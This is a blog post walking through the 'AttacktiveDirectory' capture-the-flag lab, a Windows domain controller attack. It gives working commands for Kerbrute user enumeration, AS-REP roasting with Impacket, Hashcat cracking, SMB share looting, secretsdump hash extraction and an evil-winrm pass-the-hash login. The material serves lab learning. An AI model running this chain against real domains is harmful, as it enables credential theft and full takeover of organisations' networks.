Open in app

Sign in

Write

Sign in

AttacktiveDirectory

Casey Hillmann
6 min readApr 27, 2021

In this article I will be demonstrating a pass-the-hash attack on a Windows Domain Controller made possible from a user account with disabled Kerberos pre-authentication.

Enumeration:

Running Nmap

nmap -A -T4 -p- -oG AD 10.10.84.174
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-22 16:28 EDT
Warning: 10.10.84.174 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.84.174
Host is up (0.11s latency).
Not shown: 65501 closed ports
PORT      STATE    SERVICE       VERSION
53/tcp    open     domain        Simple DNS Plus
80/tcp    open     http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2021-04-22 20:41:14Z)
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open     ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp   open     microsoft-ds?
464/tcp   open     kpasswd5?
593/tcp   open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open     tcpwrapped
3268/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp  open     tcpwrapped
3389/tcp  open     ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: THM-AD
|   NetBIOS_Domain_Name: THM-AD
|   NetBIOS_Computer_Name: ATTACKTIVEDIREC
|   DNS_Domain_Name: spookysec.local
|   DNS_Computer_Name: AttacktiveDirectory.spookysec.local
|   Product_Version: 10.0.17763
|_  System_Time: 2021-04-22T20:42:04+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2021-04-21T20:24:06
|_Not valid after:  2021-10-21T20:24:06
|_ssl-date: 2021-04-22T20:42:13+00:00; -2s from scanner time.
5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7554/tcp  filtered unknown
9389/tcp  open     mc-nmf        .NET Message Framing
11012/tcp filtered unknown
20974/tcp filtered unknown
28728/tcp filtered unknown
39608/tcp filtered unknown
47001/tcp open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open     msrpc         Microsoft Windows RPC
49665/tcp open     msrpc         Microsoft Windows RPC
49666/tcp open     msrpc         Microsoft Windows RPC
49669/tcp open     msrpc         Microsoft Windows RPC
49672/tcp open     msrpc         Microsoft Windows RPC
49675/tcp open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
49676/tcp open     msrpc         Microsoft Windows RPC
49679/tcp open     msrpc         Microsoft Windows RPC
49683/tcp open     msrpc         Microsoft Windows RPC
49697/tcp open     msrpc         Microsoft Windows RPC
49818/tcp open     msrpc         Microsoft Windows RPC
54462/tcp filtered unknown
59858/tcp filtered unknown
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -2s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-04-22T20:42:06
|_  start_date: N/AService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 846.44 seconds

Nmap states that the domain name is spookysec.local. Before enumerating users via Kerbrute the IP and domain name need to be added in /etc/hosts.

Now that Kali understands the name attached to the IP we can use the domain name in the Kerbrute syntax. Kerbrute will use the Kerberos service to enumerate users from Active directory via a provided username list.

./kerbrute userenum -d spookysec.local --dc spookysec.local /home/kali/users.txt -t 100

Once Kerbrute completes it appears that user svc-admin does not require pre-authentication and it was able to dump a hash that we can crack offline. When Kerberos pre-authentication is enabled a timestamp will be encrypted using the user’s password hash and encryption key. When KDC reads a valid timestamp from the user’s password hash, it trusts that it isn’t a replay attack. If pre-authentication is disabled, as found here, an attacker can send a dummy request to the KDC, the KDC will then send an encrypted TGT which can be brute forced offline.

Exploitation:

Brute forcing the hash can be done by copying the entire hash into a text file and running it against a password list using Hashcat. Retrieving a hash to brute force can be achieved by using Impacket’s GetNPUsers tool.

impacket-GetNPUsers spookyse.local/svc-admin -no-pass
TGT hash retrieved by GetNPUsers

To brute force the hash against a password list, copy the entire hash and paste it into a text file. In order for Hashcat to understand the type of hash being used we must determine the mode, this can be accomplished by comparing our hash to other hash examples within the Hashcat wiki. According to the examples our hash is a “Kerberos 5 AS-REP etype 23” and Hashcat uses mode 18200 for this hash type.

example_hashes [hashcat wiki]

Mode, hash type and hash example from Hashcat wiki
hashcat --force -m 18200 -a 0 hash.txt passwordlist.txt
Success brute force — password outlined in red.

After obtaining a username and password it’s time to determine where these credentials can be used. Referring back to Nmap port 445/tcp is open and might accept our credentials via smbclient. More enumeration will need to be completed to determine what shares are available. This can be accomplished by using the -L switch.

smbclient -L \\\\10.10.9.158\\ -U svc-admin

Backup looks like an interesting share that can be accessed.

smbclient \\\\10.10.9.158\\backup -U svc-admin

Once connected, the dir command displays a text file.

Downloading file from the remote smb share to Kali.

The credentials appear to be encoded as weak attempt to obfuscate the password.

To determine the type of hash I used the online tool that determined it was base64 as I suspected.

Hash Analyzer — TunnelsUP

Base64 can be easily decoded using the script below.

base64 -d <filename.txt>
Password outlined in red.

Now that another set of credentials has been obtain it is possible to gain privileged access to this domain controller. Using another tool by Impacket called secretsdump.py it is possible to retrieve already synced password hashes that this user has with the domain controller. If retrieval is successful a pass-the-hash attack may be possible.

secretsdump.py backup@spookysec.local

Secretsdump.py was able to successfully dump the NTLM hashes of a large list of users. Focusing on the Administrator account we can use Evil-winRM to pass the NT hash and gain administrator access to a shell.

evil-winrm -i 10.10.9.158 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc

--

--

Casey Hillmann

Written by Casey Hillmann

1 Follower

Writer of cyber security content. Follow my blog for all things related to offensive security and threat hunting.

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams